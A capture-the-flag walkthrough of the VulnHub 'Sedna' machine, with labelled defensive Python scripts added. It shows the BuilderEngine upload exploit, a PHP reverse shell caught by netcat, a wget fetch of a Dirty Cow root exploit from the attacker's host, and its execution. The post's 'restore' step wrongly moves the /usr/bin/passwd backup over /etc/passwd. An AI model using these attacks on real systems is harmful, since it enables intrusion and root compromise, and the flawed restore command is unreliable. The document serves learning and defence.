VulnHub Sedna Solution


For background information on this series of CTFs you may want to read this page. Or, if you're just after my solution, please keep reading.

Sedna

Intro

This is the second of three incrementally difficult CTFs created for HackFest 2016 and released on the VulnHub platform.

Link – https://www.vulnhub.com/entry/hackfest2016-sedna,181/

Difficulty – Medium

My Solution

As always, start with an Nmap scan to see which ports are open.

Scanning 192.168.5.10 [65535 ports]
Discovered open port 139/tcp on 192.168.5.10
Discovered open port 22/tcp on 192.168.5.10
Discovered open port 993/tcp on 192.168.5.10
Discovered open port 445/tcp on 192.168.5.10
Discovered open port 80/tcp on 192.168.5.10
Discovered open port 110/tcp on 192.168.5.10
Discovered open port 111/tcp on 192.168.5.10
Discovered open port 8080/tcp on 192.168.5.10
Discovered open port 995/tcp on 192.168.5.10
Discovered open port 53/tcp on 192.168.5.10
Discovered open port 143/tcp on 192.168.5.10
Discovered open port 46965/tcp on 192.168.5.10
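From a defender's side, the same scan output is most useful when it is compared against what the host is supposed to expose. The following script is an added example, not part of the original write-up: it parses Nmap's verbose "Discovered open port" lines (copied from the scan above as constructed input) and reports every port that is not in an expected-exposure baseline. The baseline itself is hypothetical, chosen only to illustrate the comparison.

```python
"""Parse Nmap's verbose 'Discovered open port' lines and compare the result with
an expected-exposure baseline. Added example, not from the original write-up;
the scan lines are copied from the post, the baseline is a hypothetical one."""
import re

# Constructed input: the open-port lines the post's scan reported for the lab host.
SAMPLE_SCAN = """\
Scanning 192.168.5.10 [65535 ports]
Discovered open port 139/tcp on 192.168.5.10
Discovered open port 22/tcp on 192.168.5.10
Discovered open port 993/tcp on 192.168.5.10
Discovered open port 445/tcp on 192.168.5.10
Discovered open port 80/tcp on 192.168.5.10
Discovered open port 110/tcp on 192.168.5.10
Discovered open port 111/tcp on 192.168.5.10
Discovered open port 8080/tcp on 192.168.5.10
Discovered open port 995/tcp on 192.168.5.10
Discovered open port 53/tcp on 192.168.5.10
Discovered open port 143/tcp on 192.168.5.10
Discovered open port 46965/tcp on 192.168.5.10
"""

# Hypothetical baseline: the services an operator intends this host to expose.
# Anything observed that is not listed here is reported as unexpected.
EXPECTED_BASELINE = {
    "192.168.5.10": {(22, "tcp"), (53, "tcp"), (80, "tcp"), (143, "tcp"), (993, "tcp")},
}

OPEN_PORT_RE = re.compile(
    r"^Discovered open port (?P<port>\d{1,5})/(?P<proto>tcp|udp) on (?P<host>\S+)$"
)


def parse_open_ports(scan_text):
    """Return {host: {(port, proto), ...}} built from matching scan lines.

    Lines that do not match (banners, progress output) are ignored, and a port
    outside 1-65535 is dropped rather than trusted.
    """
    found = {}
    for line in scan_text.splitlines():
        match = OPEN_PORT_RE.match(line.strip())
        if match is None:
            continue
        port = int(match.group("port"))
        if not 1 <= port <= 65535:
            continue
        found.setdefault(match.group("host"), set()).add((port, match.group("proto")))
    return found


def diff_against_baseline(found, baseline):
    """Return {host: {"unexpected": [...], "missing": [...]}} for every host in either map."""
    report = {}
    for host in sorted(set(found) | set(baseline)):
        observed = found.get(host, set())
        expected = baseline.get(host, set())
        report[host] = {
            "unexpected": sorted(observed - expected),  # open but not in the baseline
            "missing": sorted(expected - observed),     # in the baseline but not open
        }
    return report


if __name__ == "__main__":
    report = diff_against_baseline(parse_open_ports(SAMPLE_SCAN), EXPECTED_BASELINE)
    for host, result in report.items():
        for port, proto in result["unexpected"]:
            print(f"{host}: unexpected open port {port}/{proto}")
        for port, proto in result["missing"]:
            print(f"{host}: expected service not listening on {port}/{proto}")
```

Run it and the SMB (139, 445), POP3/IMAPS variants, the alternate HTTP port and the high RPC port all come out as unexpected against that baseline, which is exactly the list a reviewer would want to explain before the box went into production.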

It looks very similar to the previous challenge, so I head straight to port 80.

Same opening page with no other clues, so I start a Nikto scan.

[email protected]:~/Desktop# nikto -h http://192.168.5.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.5.10
+ Target Hostname:    192.168.5.10
+ Target Port:        80
+ Start Time:         2017-04-09 14:42:03 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7537 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2017-04-09 14:42:43 (GMT1) (40 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[email protected]:~/Desktop# 
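Three of the Nikto findings above are plain response-header hygiene (missing X-Frame-Options, missing X-Content-Type-Options, a Server banner that names the Apache version) and one concerns the ETag format. The script below is an added example, not from the original post or from Nikto: it audits a header set for those points. Both header dictionaries are constructed, one modelled on what Nikto reported for the lab host and one on a hardened configuration.

```python
"""Audit HTTP response headers for the weaknesses Nikto reported above.
Added example, not from the original post; the header sets are constructed to
match Nikto's findings (weak) and a hardened configuration (fixed)."""
import re

# Constructed: roughly what the lab host returned, judging by the Nikto output.
WEAK_HEADERS = {
    "Server": "Apache/2.4.7 (Ubuntu)",
    "ETag": '"65-53fb059bb5bc8"',
    "Content-Type": "text/html",
}

# Constructed: the same response after hardening the Apache configuration.
HARDENED_HEADERS = {
    "Server": "Apache",
    "Content-Type": "text/html",
    "X-Frame-Options": "SAMEORIGIN",
    "X-Content-Type-Options": "nosniff",
}

# A slash followed by a digit in the Server header is a product version.
VERSION_IN_SERVER = re.compile(r"/\d")
# Apache's FileETag output: two or three hyphen-separated hex fields.
FILE_METADATA_ETAG = re.compile(r"^[0-9a-f]+(-[0-9a-f]+){1,2}$")


def audit_headers(headers):
    """Return a list of findings; an empty list means every check passed.

    Header names are matched case-insensitively, as HTTP requires.
    """
    h = {name.lower(): value.strip() for name, value in headers.items()}
    findings = []

    xfo = h.get("x-frame-options", "").upper()
    if xfo not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options missing or not DENY/SAMEORIGIN (clickjacking)")

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options is not 'nosniff' (MIME sniffing)")

    server = h.get("server", "")
    if VERSION_IN_SERVER.search(server):
        findings.append(f"Server header discloses a version: {server}")

    etag = h.get("etag", "").strip('"')
    if FILE_METADATA_ETAG.match(etag):
        findings.append(f"ETag looks file-metadata derived ({etag}); review FileETag")

    return findings


if __name__ == "__main__":
    for label, headers in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(f"{label}: {audit_headers(headers) or ['no findings']}")
```

On Apache the corresponding fixes are configuration only: `ServerTokens Prod` trims the banner to "Apache", `FileETag None` stops emitting the metadata-derived tag, and with mod_headers loaded `Header always set X-Frame-Options "SAMEORIGIN"` and `Header always set X-Content-Type-Options "nosniff"` add the two missing headers. The example deliberately does not check X-XSS-Protection, which Nikto also lists, because current browsers have removed the auditor that header controlled.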

Looking at license.txt reveals a potential name of some installed software.

Copyright (c) 2012 – 2015 BuilderEngine / Radian Enterprise Systems Limited.

And searchsploit shows a potential file upload vulnerability.

[email protected]:~/Desktop# searchsploit builderengine
------------------------------------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                                                          |  Path
                                                                                                                        | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------------------------------------------------------------ ----------------------------------
BuilderEngine 3.5.0 - Arbitrary File Upload                                                                             | php/webapps/40390.php
------------------------------------------------------------------------------------------------------------------------ ----------------------------------
[email protected]:~/Desktop# 

It's a basic PHP upload form. I spin up Apache on Kali, copy the file into the webroot, edit the form action on the PHP page to point at the Sedna IP and open the page on my localhost.

I give the upload form the PHP reverse shell from Pentest Monkey and get a JSON response that confirms my upload and tells me where to find my file.

{"files":[{"name":"shell.php","size":5490,"type":"application\/x-php","url":"http:\/\/192.168.5.10\/files\/shell.php","deleteUrl":"http:\/\/192.168.5.10\/themes\/dashboard\/assets\/plugins\/jquery-file-upload\/server\/php\/?file=shell.php","deleteType":"DELETE"}]}

Start a netcat listener, visit the remote page, http://192.168.5.10/files/shell.php, in a browser window and with any luck get a shell back.

[email protected]:~/VulnHub/sedna# cp 40390.php /var/www/html/
[email protected]:~/VulnHub/sedna# nano /var/www/html/40390.php 
[email protected]:~/VulnHub/sedna# nc -l -vv -p 1234
listening on [any] 1234 ...
192.168.5.10: inverse host lookup failed: Unknown host
connect to [10.0.8.2] from (UNKNOWN) [192.168.5.10] 33701
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
 09:54:25 up 18 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
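The JSON response above tells the whole story of the weakness: the server accepted a file named shell.php with a client-declared type of application/x-php and stored it under the web root with its name intact. The following is an added example in generic Python, not the BuilderEngine or jQuery-File-Upload code: a validator that mirrors that failure mode next to a hardened one that uses an extension allow-list, checks the file's leading bytes against the extension, rejects double extensions and lets the server choose the stored name. The magic-byte table, size limit and sample inputs are constructed for illustration.

```python
"""Why the upload above succeeded, and one way to stop it. Added example in
generic Python, not the application's own code; the validators, magic-byte
table and sample inputs are constructed for illustration."""
import os
import secrets


class UploadRejected(Exception):
    """Raised when an upload fails validation."""


# Allow-list of extensions with the leading bytes each file type must start with.
MAGIC_BY_EXTENSION = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def weak_validate(filename, content_type, data):
    """Mirrors the failure mode seen above: the client-supplied name and
    content type are trusted, so a .php upload lands under the web root
    with its name intact."""
    if not filename or not data:
        raise UploadRejected("empty upload")
    return filename  # stored as-is, e.g. files/shell.php


def hardened_validate(filename, data, max_bytes=2 * 1024 * 1024):
    """Accept only allow-listed image types whose content matches the
    extension, and return a server-chosen name so the client never controls
    what is stored or where."""
    base = os.path.basename(filename)  # drop any directory components
    root, ext = os.path.splitext(base.lower())
    if not root or "." in root:
        # 'shell.php.jpg' style names are rejected outright rather than interpreted
        raise UploadRejected("double or empty extension")
    if ext not in MAGIC_BY_EXTENSION:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if len(data) > max_bytes:
        raise UploadRejected("file too large")
    if not data.startswith(MAGIC_BY_EXTENSION[ext]):
        raise UploadRejected("content does not match extension")
    return secrets.token_hex(16) + ext


def is_rejected(filename, data):
    """True if the hardened validator refuses the upload."""
    try:
        hardened_validate(filename, data)
    except UploadRejected:
        return True
    return False


# Constructed inputs: a placeholder script body (not a payload) and a minimal JPEG header.
SCRIPT_BODY = b"<?php /* constructed placeholder, not a payload */ ?>"
JPEG_BODY = b"\xff\xd8\xff\xe0" + b"\x00" * 16


if __name__ == "__main__":
    print("weak validator stores:", weak_validate("shell.php", "application/x-php", SCRIPT_BODY))
    for name, body in (("shell.php", SCRIPT_BODY), ("shell.php.jpg", SCRIPT_BODY),
                       ("photo.jpg", SCRIPT_BODY), ("../photo.jpg", JPEG_BODY)):
        try:
            print(f"hardened accepts {name!r} as {hardened_validate(name, body)}")
        except UploadRejected as exc:
            print(f"hardened rejects {name!r}: {exc}")
```

Rejecting names with more than one dot matters on Apache, where mod_mime evaluates every dot-separated extension in a filename, so an `AddHandler` line for .php can still apply to shell.php.jpg. Renaming to a random token also removes the second half of the problem visible in the JSON above: the attacker knowing in advance the exact URL the stored file will have.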

Then into my usual hands-on routine:

  1. Spawn a TTY shell
  2. Dump a file listing to the web root
  3. Search for flags
  4. Upload a Linux enumeration script

$ python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/$ ls /var/www/ 
ls /var/www/
flag.txt  html
[email protected]:/$ find / > /var/www/html/dirs.txt
[email protected]:/$ grep flag.txt /var/www/html/dirs.txt
grep flag.txt /var/www/html/dirs.txt
/var/www/flag.txt
[email protected]:/$ cat /var/www/flag.txt
cat /var/www/flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
[email protected]:/$ 

I used the same uploader we used to push the shell up to push my favorite enum script from highoncoffee.

[email protected]:/$ cd /var/www/html/files/
cd /var/www/html/files/
[email protected]:/var/www/html/files$ ls
ls
be_demo        captcha		    loading.gif  users
blogimage.jpg  linux-local-enum.sh  shell.php
[email protected]:/var/www/html/files$ chmod +x linux-local-enum.sh
chmod +x linux-local-enum.sh
[email protected]:/var/www/html/files$ ./linux-local-enum.sh > enum.txt
./linux-local-enum.sh > enum.txt

Looking through the output nothing big jumps out, but the uname output shows this is running an old version of Ubuntu.

Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux

Searching for ‘Linux 3.13 exploits’ revealed a few possible solutions. After trying and failing with the overlayfs exploit I tried Dirty Cow, a privilege escalation vulnerability that affected a wide range of kernel versions. There are plenty of PoCs on the website: https://dirtycow.ninja/

I took a copy of cowroot from https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679 and configured it for x86 by commenting out the other payload.

I transferred it to the target, then compiled and executed it as per the instructions.

--2017-04-09 11:57:40--  http://10.0.8.2:8000/cowroot.c
Connecting to 10.0.8.2:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4966 (4.8K) [text/plain]
Saving to: 'cowroot.c'

100%[======================================>] 4,966       --.-K/s   in 0.001s  

2017-04-09 11:57:40 (6.26 MB/s) - 'cowroot.c' saved [4966/4966]

[email protected]:/tmp$ gcc cowroot.c -o cowroot -pthread
gcc cowroot.c -o cowroot -pthread
cowroot.c: In function 'procselfmemThread':
cowroot.c:99:9: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [enabled by default]
         lseek(f,map,SEEK_SET);
         ^
In file included from cowroot.c:28:0:
/usr/include/unistd.h:334:16: note: expected '__off_t' but argument is of type 'void *'
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
                ^
cowroot.c: In function 'main':
cowroot.c:142:5: warning: format '%d' expects argument of type 'int', but argument 2 has type '__off_t' [-Wformat=]
     printf("Size of binary: %d\n", st.st_size);
     ^
[email protected]:/tmp$ ./cowroot
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 45420
Racing, this may take a while..
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
[email protected]:/tmp#

This worked for a second then died. I ended up having to restart the VM manually. After reading the thread on the exploit page I noticed that it had some stability issues, which could be overcome by issuing a single line after the exploit completed.

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

So I tried again and this time immediately entered the new command. Success :) A stable root shell.

I followed the instructions and restored /etc/passwd for future use, then grabbed the root flag.

[email protected]:/tmp# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
[email protected]:/tmp# mv /tmp/bak /etc/passwd
mv /tmp/bak /etc/passwd
[email protected]:/tmp# ls /root/
ls /root/
8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip  chkrootkit  flag.txt
[email protected]:/tmp# cat /root/flag.txt
cat /root/flag.txt
a10828bee17db751de4b936614558305
[email protected]:/tmp# 
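The PoC's own output above ("Backing up /usr/bin/passwd.. to /tmp/bak", "/usr/bin/passwd is overwritten") shows what this escalation leaves behind on disk: a setuid root binary whose contents changed in place while its path, owner and mode stayed the same, so that is the file an integrity check would flag and the path the backup in /tmp/bak belongs to. The script below is an added example, not from the post or from cowroot: it builds a hash-and-mode baseline for a list of binaries and reports any that have changed. The "binaries" are placeholder files constructed in a temporary directory so the demo runs anywhere; on a real host the baseline would be built from the actual setuid paths and stored off-box.

```python
"""Detect a replaced setuid binary with a content, mode and owner baseline.
Added example, not from the post or the cowroot PoC; the 'binaries' and the
baseline are constructed in a temporary directory so the demo runs anywhere."""
import hashlib
import os
import shutil
import stat
import tempfile


def sha256_file(path):
    """Stream-hash a file so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(paths):
    """Record hash, permission bits and owner uid for each path."""
    baseline = {}
    for path in paths:
        st = os.stat(path)
        baseline[path] = {
            "sha256": sha256_file(path),
            "mode": stat.S_IMODE(st.st_mode),
            "uid": st.st_uid,
        }
    return baseline


def check_baseline(baseline):
    """Return [(path, reason), ...]; an empty list means nothing changed."""
    findings = []
    for path, expected in baseline.items():
        if not os.path.exists(path):
            findings.append((path, "missing"))
            continue
        st = os.stat(path)
        if sha256_file(path) != expected["sha256"]:
            findings.append((path, "content changed"))
        if stat.S_IMODE(st.st_mode) != expected["mode"]:
            findings.append((path, "mode changed"))
        if st.st_uid != expected["uid"]:
            findings.append((path, "owner changed"))
    return findings


def demo():
    """Constructed scenario: baseline two placeholder files, then overwrite one
    in place (as the PoC above did to /usr/bin/passwd) and change the mode of
    the other. Real setuid binaries would be baselined as 0o4755; plain 0o755
    is used here so the demo behaves the same whether or not it runs as root."""
    workdir = tempfile.mkdtemp()
    try:
        passwd = os.path.join(workdir, "passwd")
        su = os.path.join(workdir, "su")
        for path in (passwd, su):
            with open(path, "wb") as fh:
                fh.write(b"\x7fELF placeholder for " + os.path.basename(path).encode())
            os.chmod(path, 0o755)
        baseline = build_baseline([passwd, su])
        with open(passwd, "wb") as fh:  # same path, same mode, new content
            fh.write(b"\x7fELF placeholder replaced by something else")
        os.chmod(su, 0o700)  # permission bits drift on the other file
        return check_baseline(baseline)
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{os.path.basename(path)}: {reason}")
```

Because the overwrite happened through the page cache rather than through a normal file replacement, the inode, owner and permission bits of the binary are unchanged afterwards; only a content hash catches it, which is why the baseline stores one. In practice the restore step should return /tmp/bak to the path the PoC reported backing up, and the baseline check run afterwards should then come back clean for that file.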

Job complete, on to the next one.

As usual, questions, queries and comments below.